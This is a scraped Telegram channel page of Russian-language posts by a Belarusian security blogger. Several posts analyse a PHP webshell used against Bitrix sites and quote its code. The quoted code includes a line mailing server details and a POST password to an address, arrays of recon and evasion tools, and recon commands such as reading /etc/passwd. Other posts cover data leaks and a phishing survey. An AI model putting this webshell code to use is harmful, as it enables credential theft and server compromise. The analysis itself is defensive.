Полешук в мире ИБ


Channel's geo and language: Belarus, Russian
Category: Technologies


Таки Шалом! Давайте сразу - я душнила и пессимист в ИБ, потому что или я прав, или приятно удивлен.
Обиженые и ранимые сразу могут киш мир ин тухес.
⚠️ ЭТО ЛИЧНЫЙ КАНАЛ и не аффектированный ни с одной из компаний. Мнения сугубо личные!

Related channels  |  Similar channels

Channel's geo and language
Belarus, Russian
Statistics
Posts filter


Факт №1: я люблю свою работу и свое призвание быть ИБшником, мне нравится помогать людям обучая их, помогая решать проблемы, спорить что бы найти истину.
Факт №2: я ненавижу тратить на людей время впустую.

Больше трех недель назад провел много времени на объяснение, как грамотно реализовать требования законодательства. Много приводил примеров, говорил о том, что не нужно принимать, как результат работы, "сырой" отчет сканера уязвимостей, что нужно требовать от аудиторов не только выявления проблем, но и обоснования реального ущерба для активов, что крайне безграмотно выявлять уязвимости и все их слепо патчить, что нет абсолютно чистой информационной системы - есть правильный менеджмент, контроль и ответственность за процессы.

К моему разочарованию в людях, пол дня чувствую себя как герой мема. Безусловно, я уважаю мнение других и другие вправе принимать самостоятельно решения и совершать поступки. Но давайте честно и прямо - если вы не уважаете других, то почему другие должны продолжать вам помогать?

Так что, мадам и мисье - ведите себя по отношению к другим так, как хотите что бы поступали с вами👀


Мне сегодня задали вопрос "где найти сотрудника для своей компании"

Как вариант найти голодных студентов... 🍔


Алексей Викторович (который Лукацкий) написал пост, почему он каждый раз готовит новую презентацию для выступления🧑‍💻

Сегодня буду выступать в бизнес-клубе и специально под аудиторию и под формат готовил новую презентацию, хотя можно было взять «дежурную». Да, из нее перенес два слайда, но потратил время для дизайна и стиля.

Правильно говорит Алексей Викторович - свою аудиторию нужно уважать😉


Крайняя контрольная точка по кейсу с разбором инцидента (честно-честно)😼

После разбора имеющейся информации и переспав с мыслями, меня не оставляет два вопроса:
➖как шелл попал на сервер?
➖почему Битрикс24 - не началась ли компания по работе с фокусом на платформу?

2️⃣Начну со второго

Нет. По данным из официального сайта Битрикс24 подвержен тем же угрозам, что и обычный веб-сайт, а именно:
Cross Site Scripting
SQL- injection
PHP- injection
HTTP Response Splitting
HTML code injection
File Inclusion
Directory traversal и некоторые другие.

Важный комментарий на самом сайте:
Только системное проектирование, продумывание вопросов безопасности на всех этапах разработки и детальное тестирование готового приложения могут позволить исключить появления уязвимостей.


То есть про обеспечение безопасности было акцентировано внимание разработчиком. Значит два сценария:
❓халатное отношение
❓недостаток в безопасности

По первому: все таки проблема задетектирована, значит что-то было из СЗИ до сайта.

По второму веселее. Когда мы видим веб-шел значит киберпреступник уже провел разведку, получил первоначальный доступ, провел успешно загрузку ВПО на «нулевого пациента» и сейчас старается закрепиться в инфраструктуре для начала атаки.

Не проверял на практике свое предположение по «циклу Деминга», но в теории при грамотной эшелонированной защите логика должна была выглядеть так (+ ZTNA в помощь):
➖на уровне GeoIP мы отсекаем адреса сторонних регионов;
➖если такое невозможно проводим фокусную настройку NGFW;
➖обеспечиваем актуальность получения фидов для IDS/IPS (половина адресов в этот момент должна была быть заблокированной);
➖после снижения риска в ход идут сигнатуры WAF;
➖если WAF пропускает в ход идет EPP/EDR.

1️⃣Вот тут нужен ответ на первый вопрос: как его закинули?

Опять к теории. Есть несколько классических способов:
➖доступ к веб-сайту через «админку»;
➖доступ к файлам сайта по FTP, SSH;
➖обмануть сервер загрузив вместо картинки иной файлик (собственно, в отчете не было информации про это никакой)

Но каким бы способом не кидали бы ВПО его ОБЯЗАНЫ были увидеть потоковым антивирусом («привет» нормальному NGFW на периметре в зоне ответственности владельцев платформы) или хостовым антивирусом (тут «привет» ИБшникам организации).

Резюмирую. Битрикс24❤️ как платформа вообще не при делах. Это всего лишь точка входа для более важных для киберпреступников данных (а не просто цель закинуть «майнер»). Обеспечить безопасность можно было минимум тремя классами продуктов ИБ и не раздувать соломенкой муху💩


OpenAI опубликовали отчет, что пресекли более 20 «операций влияния»🧐, в которых ChatGPT использовался для отладки и разработки вредоносного ПО, распространения дезинформации, уклонения от обнаружения и проведения фишинговых атак.

Разработчики подтвердили факт злоупотребления возможностями ChatGPT и описали конкретные случаи, когда китайские и иранские хакеры злоупотребляли чат-ботом для повышения эффективности своих операций🤓

Краткое содержание можно почитать на Хакере

Отчет можно скачать тут


Несколько интересных деталей про скрипт, о котором не написали в отчете (прочитал все строки кода☺️)

Для маскировки атаки используется ORBs (области происхождения атаки) - злоумышленники запускают свои атаки не с традиционных серверов, а через домашние маршрутизаторы или другие IoT-устройства (привет китайским🇨🇳 или северокорейским🇰🇵 киберпреступникам). Это позволяет скрываться среди обычного интернет-трафика, делая их атаки более сложными для обнаружения.

Скрипт взаимодействует со следующими базами данных:
✔️MySQL (mysql_get_client_info)
✔️MSSQL (mssql_connect)
✔️PostgreSQL (pg_connect)
✔️Oracle (oci_connect)

Проверяет доступные команды и доступы - если обнаружены, они помечаются как “Userful” (полезные), “Danger” (опасные), или “Downloaders”.

Выглядит это так:

$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

Тут видно, что скрипт проверяет антивирусное ПО и передает информацию на C2. Поэтому согласен - моя ошибка в предположении. Хотя и лучше было бы его использовать - антивирус сработал бы в режиме "пугало". Ай-ай-ай не использовать!

Скрипт умеет взаимодействовать с ОС, запуская там команды:
Windows:

dir: список файлов и папок.
netstat -an: показывает активные подключения.
net start: отображает запущенные службы.
net user: показывает учетные записи пользователей.
ipconfig /all: выводит полную информацию о сетевых настройках

Unix:

ls -lha: список
файлов с
п
о
дробной информацией.
ps aux: ото
браж
ает инф
ормацию о запущенных процессах.
find: по
иск
файлов по различным критериям, включая файлы конфигурации, файлы с определенными правами
доступа и т.д.
locate:
быстрое нахождение файлов по имени, используя предварительно проиндексированные данные.


Шел брутит доступ к БД исходя из данных /etc/passwd или из файла-словаря, который киберпреступник кидает на сервер, если что.


Поняв, что я не буду и не хочу читать 1634 строки, начал играться в динамике с кодом, собственно говоря как игрались и до меня незаблюрив код. Но если хочется, то и такое (и не такое) прочитаю.

Что там увидел:
- ссылки на классы и функции, которые используются в платформе Bitrix, а именно Bitrixx5CMain и ORM. Это классы из ядра системы Bitrix, связаны с обработкой данных. То есть я предполагаю, что атака не совсем на отдельные скрипты, а атака именно на Битрикс24 (просто срикпты могут быть не пропатчены).

- упоминание ResultIterator, Error, DB, и ArrayResult — скрипт нацелен на работу с базой данных (а не на платформу, меняя вектор угроз - вот видимо почему НЦЗПД обратило внимание, была бы угроза простого deface - думаю никому бы не было и дела).

- обнаружена команда cat /etc/passwd - интересовали кроме данных еще и пароли на сайт и платформу.

- обращение к Bitrix\Main\ORM\Data\Result. Это стандартная библиотека для работы с базой данных, где результат запроса к БД инкапсулируется в объект класса Result.

- Bitrix\Main\Type\Dictionary — это класс для работы со словарями в Bitrix. Он может содержать данные в виде ключ-значение.

- Bitrix\Main\DB\ResultIterator — это итератор для работы с результатами запроса к базе данных. Он управляет выборкой данных из БД, проходя по строкам результата.

В общем стало понятно, куда собрались атакующие - к базе данных и более уверен, что вектор этой атаки и проститимулировал НЦЗПД обратить на кейс внимание, а не просто атака, что бы всунуть майнер. Кстати, упомянув в качестве жертвы "магазин косметики" и изучив кейсы я знаю, что это был за магазин 🤩 (в нем у меня тоже карточки нет, к слову - как чувствовал).

Про вишенку чуть не забыл! 🍒

По словам расследователей было выявлены IPv4 адреса и все они опубликованы для IOC. Вот только они минимум две недели, как половина из них IOC у нормальных поставщиков данных для NGFW:

https://www.virustotal.com/gui/ip-address/204.8.96.167
https://www.virustotal.com/gui/ip-address/45.61.185.172
https://www.virustotal.com/gui/ip-address/185.220.101.15
https://www.virustotal.com/gui/ip-address/31.133.0.26
https://www.virustotal.com/gui/ip-address/185.220.100.240
https://www.virustotal.com/gui/ip-address/185.130.44.59
https://www.virustotal.com/gui/ip-address/185.40.4.100
https://www.virustotal.com/gui/ip-address/185.220.101.14
https://www.virustotal.com/gui/ip-address/45.139.122.176
https://www.virustotal.com/gui/ip-address/185.40.4.92
https://www.virustotal.com/gui/ip-address/185.220.100.253
https://www.virustotal.com/gui/ip-address/89.22.237.65
https://www.virustotal.com/gui/ip-address/178.236.247.6
https://www.virustotal.com/gui/ip-address/107.189.1.167
https://www.virustotal.com/gui/ip-address/185.244.192.175
https://www.virustotal.com/gui/ip-address/109.70.100.65
https://www.virustotal.com/gui/ip-address/185.220.100.252
https://www.virustotal.com/gui/ip-address/185.207.107.216
https://www.virustotal.com/gui/ip-address/185.220.101.36

Как по мне - работа хорошая, ребята молодцы. Но все же:
- используя нормальный NGFW с актуальными фидами можно было еще на моменте сканирования отсечь и заблокировать узлы от таких подозрительных адресов;
- на уровне даже не EPP, а потокового антивируса не разрешить загрузку шела на сервер;
- настроить WAF, добавив сигнатуры атаки, что бы исключить иных попыток.

Но а так все реально норм, молодцы еще раз


Так, давайте сразу еще раз - я никого не собираюсь обижать, унижать, дискредитировать, однако…

Однако компания «обижулек на меня» обнаружила по их классификации “цепочку взломов сайтов” через уязвимые скрипты продуктов «Аспро», которые созданы для сайтов на CMS 1С-Битрикс. Разместив на своем сайте новость и украсив их скриншотами и некоторыми данными ее сразу закрепостил себе НЦЗПД в свой ТГ-канал.

Да, информации там маловато, но что удалось увидеть это скрипт (и даже дали прямую ссылку на загрузку - решение странное, но ладно). Что в нем интересно- это форк HEUR:Backdoor.PHP.WebShell.gen которому уже 2 годика (на Virustotal его заметили 17 августа 2022 года, а на другой коммерческой TI-платформе 15 августа 2022 года).

Я же когда-то имел дело с PHP и стал люто его ненавидеть, поэтому полез во внутрь (чуть изменил, что бы не было кликабельности):


if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass'];
@mail('test[@]testmail[.]com', 'root', $tmp); // Edit or delete!
}

- если в POST-запросе присутствует параметр watching, скрипт собирает данные о текущем сервере (SERVER_NAME — имя сервера, PHP_SELF — текущий исполняемый скрипт) и объединяет их с паролем, переданным через POST-запрос в параметре pass;
- после этого данные отправляются на указанный адрес электронной почты test[@]testmail[.]com

Самое смешное то, что никто не удалил или не заменил стандартные настройки - а обижульки говорят, что именно этим кодом пользовались преступники. Находясь в БД угроз его бы при загрузке на сервер заметил бы самый элементарный EPP, не говоря про потоковый антивирус. Что-то не сходится в этой истории, но идем дальше...


Пароль

$▛ = "fa769dac7a0a94ee47d8ebe021eaba9e";
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);

- переменная $▛ хранит значение, вероятно, хеша пароля. Судя по структуре, это хеш, который будет использоваться для проверки авторизации;
- переменные $▘, $▜, $▚, и $▙ имеют разные значения, связанные с настройками (например, кодировка и хеш на основе User-Agent);
- переменная $▛ — это MD5-хеш пароля, который злоумышленник использует для защиты своего вебшелла.

Cookies для контроля доступа

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}

- это часть кода проверяет, установлен ли специальный cookie, связанный с текущим хостом. Если cookie не установлен, он генерируется с ключом, основанным на имени хоста и значении $▙ (MD5-хеш User-Agent). Это механизм контроля доступа, который позволяет вебшеллу проверять, был ли пользователь (злоумышленник) авторизован;
- rototype() может быть функцией, которая либо записывает cookie, либо выполняет другие действия для защиты вебшелла от неавторизованных пользователей.


Это я почему довольный? Потому что в субботу рассказывал детям сотрудников в онлайн-школе digital-технологий "А1 Rozumer" про кибербезопасность и использование искусственного интеллекта. Я постарался просто рассказать, как выглядит рабочий день родителей на мониторе у офицеров SOC.

Было все очень волнительно, но очень важно не только шагнуть на уровень выше, но и спуститься вниз и простыми словами рассказать о сложном, ведь как говорил (точнее выражение предписывают) Эйнштейну "если ты не можешь объяснить пятилетнему ребенку тему - ты в ней не разбираешься".


Video is unavailable for watching
Show in Telegram
Понедельник - день тяжелый, однако бывает и так, что неделя пролетает незаметно. Всем желаю провести именно так все 5 рабочих дней ⭐

Говоря про себя, для меня эта неделя должна стать одной из самых нагруженных за последнее время, включая обучение на двух курсах и неформальную встречу.

Но все равно, я рад, что могу это все сделать и все успеть ❤️


Video is unavailable for watching
Show in Telegram
Все таки Илон Маск это прекрасный пример того, что всегда нужно верить в то, что ты делаешь и то, что за каждой ошибкой (не одной точно) заложен прекрасный результат. Сегодня SpaceX впервые смогла приземлить на стартовую площадку первую ступень ракеты Starship, предназначенной для пилотируемых полетов 🚀


Эту неделю я начал с поста про собаку, а сегодня будет притча.

«Всей истории мира известен лишь один пример того, что нельзя купить за деньги — виляния собачьего хвоста» - цитата в начале мультфильма "Леди и Бродяга", придуманная Генри Уиллером Шоу.

---
Один суфий видел, как караульный избил собаку палкой. Собака выла, с каждым ударом всё громче и громче. Суфий спросил:
— Собака, за что он бьёт тебя?


Она ответила:
— Он не выносит рядом с собой никого, кто лучше него.


Сеть магазинов “Детский мир” оказалась довольно “веселой” компанией. В общий доступ попали данные пользователей как мобильных приложений, так и сайта. База содержит следующую информацию:
- номера бонусных карт;
- имена и фамилии клиентов;
- телефонные номера (1 982 110 уникальных);
- адреса электронной почты (1 079 373 уникальных);
- метка User-Agent (IOSApp, AndroidApp, website);
- даты покупок.

Данные актуальны на август 2024 года.

До появления новости 10 октября про утечку, 30 сентября была новость о том, что в компании более двух лет длится расследование о краже почти 4,5 тыс. подарочных сертификатов. Как уточнила изданию CNews PR-директор Наталья Рычкова:

Изначально проводилось внутреннее расследование, затем материалы преданы в СК. Персональным данным клиентов «Детский мир» ничего не угрожало и не угрожает. ИТ-уязвимости устранены сразу после их обнаружения, а дальнейшие попытки хакерской кибератаки на ИТ-системы компании предотвращены.


Не подтверждаю, но и не опровергаю информацию, что ПДн данных белорусских пользователей находятся в той-же базе, причем на белорусском сайте в разделе “Политика конфиденциальности и защиты персональной информации” ни строчки про хранение данных на территории РБ и упоминания трансграничной передачи данных нет.

Конечно, у меня есть претензия к тем, кто проводил аттестацию как можно было так ее провести, что нарушен закон? Я бы сказал больше - тут закон поимели как хотели. Не хочется думать, что по данным whois.cctld.by они стали результатом “экспресс-теста”, но мне видится:
- шовинизм в отношении ПДн, мол "у нас есть, мы крутые а на ваши законы мы ложили";
- двоякое трактование термина ”трансграничная передача данных” позволяя передавать бесконтрольно данные в страны, которые отнесены к "доверенным".

В 2024 году в России замечен значительный рост утечек персональных данных. За первое полугодие было зафиксировано более 405 миллионов строк данных, что почти в 9 раз больше, чем в аналогичном периоде 2023 года. Из них 96,7 миллиона строк оказались уникальными — то есть данные, которые ранее не появлялись в других утечках. Вот такая "зеленая и доверенная" страна, но по документам и не придраться - все отлично

Очень жду реакцию регулятора и НЦЗПД. И к слову - сколько бы не предлагали мне карту лояльности всегда отказывался и как видно - не зря.


У компании Dr.WEB беда с пресс-релизами 😔

На официальном телеграмм канале есть пост, в котором говорится, что «информация в основной своей части не соответствует действительности, пользовательские данные затронуты не были”. При этом акцентируют внимание, что изучают снимки вчерашней публикации.

В прошлый раз сразу и однозначно было озвучено, что кроме инфраструктуры ничего не пострадало и переживать нечего.

А тут и дампы всплывают, и ресурсы не доступны до сих пор, и расследование проходит.

Мутные какие-то… 🤢


Нейросеть попросили нарисовать «захват Рима готами». А интересная логика у нейросетей, скажу я вам… 😛


Ооо… Dr.WEB не только взломали, но и даже допустили утечку. Дампы содержат информацию актуальную на 17 сентября 2024 года.
Вот такая история… 😐


Данный пост может быть кому-то не по нраву, но вы знаете мое мнение

Год назад на мирных жителей юга Израиля было совершено нападение, где террористы хладнокровно убили более 1200 мужчин, женщин и детей, 251 человек были взяты в заложники ,101 из них всё ещё удерживается террористами в Газе, судьба многих из которых остается неизвестной. Израиль не простил такой выходки и кроме проведения ударов по центрам принятия решения реализовали самую изощренную атаку - взрыв пейджеров террористов

Взрывчатку в пейджерах боевиков «Хезболлы», подорвавшихся в середине сентября, было невозможно обнаружить даже с помощью рентгена. Взрывчатым веществом были начинены литиевые аккумуляторы устройств.

Неужели не было способа обнаружить? Был, конечно. Но когда в стране есть религия и предрассудки, то результат стал очевидным. Я сейчас про собак. Собаки имеют обоняние, которое значительно превосходит человеческое. Собачий нос способен обнаружить даже малейшие следы взрывчатых веществ, которые могут испаряться или выделять микроскопические частицы через микроскопические дефекты. Но когда ненависть к ближнему и религиозные догмы туманят разум - результат очевиден.

P.S. Это, кстати, сравнимо с ситуацией с ВПО, который не был обнаружен антивирусом, хотя возможность использовать EDR была. Но куда-же, менеджеру... Он же глупый, ему только продать. А вот антивируса достаточно же...

יחד ננצח🇮🇱


Давно не было ревью отчета. На этот раз интересные факты из отчета 2024 State of the Phish report от Proofpoint. Все данные из отчета больше соотносятся к североамериканскому и южноамериканскому региону, но общие тренды “плюс - минус” подходят и для Европы и для нас в целом.

Основой этого отчёта является опрос 7 500 пользователей и 1 050 специалистов по безопасности, проведённый в 15 странах. Также он включает данные Proofpoint, полученные из продуктов и исследований угроз, а также выводы, сделанные на основе 183 миллионов имитированных фишинговых сообщений, отправленных клиентами компании за 12 месяцев, и более 24 миллионов писем, которые были сообщены пользователями за тот же период.

1️⃣более 1 миллиона атак совершается каждый месяц с использованием фреймворка EvilProxy для обхода MFA, но 89% специалистов по безопасности по-прежнему считают, что MFA обеспечивает полную защиту от компрометации учетных записей;
2️⃣71% пользователей совершили потенциально-опасное действие, и 96% из них знали, что делают что-то опасное;
3️⃣5% специалистов по кибербезопасности заявили, что большинство сотрудников знают о своей ответственности за безопасность, однако 59% пользователей либо не уверены в этом, либо утверждают, что они вообще не несут ответственности;
4️⃣58% пользователей делают все, что бы стать жертвами социальной инженерии.

Что относится к рискованным действиям:
29% — использование рабочего устройства для личных целей
26% — использование одного пароля для всех сервисов
26% — подключение без использования VPN в общественных местах
24% — ответ на сообщение (email или SMS) от незнакомого отправителя
20% — посещение потенциально-опасных сайтов
19% — переход по ссылкам или загрузка вложений от неизвестного отправителя
6% — совместное использование рабочего устройства с друзьями или семьёй
13% — звонок по незнакомому номеру, указанному в срочном письме
11% — пропуск людей в офис без предъявления бейджа (“tailgating”)
10% — загрузка конфиденциальных данных в ненадёжное облачное хранилище
9% — предоставление учётных данных ненадёжному источнику (“фишинг/вищинг”)
29% — никогда не совершали рискованных действий

👻Почему совершаются рискованные действия:
44% — это удобно
39% — чтобы сэкономить время
24% — чтобы уложиться в срочный дедлайн
19% — чтобы сэкономить деньги
11% — чтобы достичь финансовых целей
10% — чтобы выполнить другие рабочие цели
5% — другие причины

🏃‍♂️Пользователи, представляющие риск:
63% — пользователи, имеющие бизнес-привилегии и доступ к критическим данным
56% — пользователи, которые охотно кликают по ссылкам (без разбору)
56% — пользователи, которые не прошли обучение кибергигиене
49% — поставщики или бизнес-партнёры
42% — люди, увольняющиеся из компании
34% — ВИПы, руководители

Время, которые сотрудники тратят на обучение (в год):
37% - 1-2 часа
25% - 31-59 минут
17% - более 4 часов
15% - 3-4 часа
6% - до 30 минут


Однажды молодой композитор пришёл к Моцарту. Он хотел знать, как развить свой талант.

— Думаю, нужно начать с простых композиций. Песен, например

— посоветовал Моцарт.

— Но вы ведь сочиняли симфонии ещё будучи ребёнком!

запротестовал молодой человек.

— Да, это так. Но я ведь не ходил к кому-либо за советом о том, как развить свой талант.


Алексей Викторович опубликовал фото "средства гарантированного уничтожения информации". Сергей Солдатов добавил важные замечания о том, что у "каждого CISO должен быть предусмотрен сценарий уничтожения критичной информации в случае потери физического контроля или попытке нарушения физической безопасности".

Вы будете удивлены, но у меня есть шо сказать!

1️⃣Выбор средств уничтожения должен быть грамотно подобран, а не быть формальным. Странно видеть, что на стене образец тубуса от РПГ-18 «Муха». Все бы ничего, однако снаряд кумулятивный и призван уничтожать бронированную технику. Но для уничтожения серверной лучше (ох уж моя офицерская штабная грамотность) использовать осколочно-фугасный или термоборический снаряд. На данном примере формализм в принятии решения 🫡

2️⃣ Нужно помнить, что принимаемые меры должны нивелировать угрозу. В данном примере, для обеспечения безопасности документов пострадает охраняемый периметр (будет зиять дырочка), а вот фактического уничтожения информации не произойдет 🤡

3️⃣Проведение тестирования. Так как тубус стреляный видимо серверная не новая, а персонал, проводящий тестирование не выявил недостатков в выбранном средстве 🤕

4️⃣Обеспечение хранения критических средств безопасности. Висящий на всеобщее обозрение гранатомет довольно не секьюрно 😈

Но прикол засчитан 😏

20 last posts shown.